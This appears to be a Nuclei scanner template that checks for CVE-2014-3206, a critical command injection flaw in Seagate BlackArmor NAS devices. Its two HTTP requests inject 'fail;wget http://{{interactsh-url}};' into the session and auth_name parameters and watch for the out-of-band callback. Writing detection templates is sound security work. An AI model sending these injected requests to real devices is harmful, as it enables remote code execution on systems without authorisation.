id: CVE-2014-3206 info: name: Seagate BlackArmor NAS - Command Injection author: gy741 severity: critical description: Seagate BlackArmor NAS allows remote attackers to execute arbitrary code via the session parameter to localhost/backupmgt/localJob.php or the auth_name parameter to localhost/backupmgmt/pre_connect_check.php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2014-3206 - https://www.exploit-db.com/exploits/33159 - https://www.exploit-db.com/exploits/33159/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2014-3206 cwe-id: CWE-20 tags: cve,cve2014,seagate,rce requests: - raw: - | GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} Accept: */* - | GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1 Host: {{Hostname}} Accept: */* unsafe: true matchers: - type: word part: interactsh_protocol words: - "http" # Enhanced by mp on 2022/02/24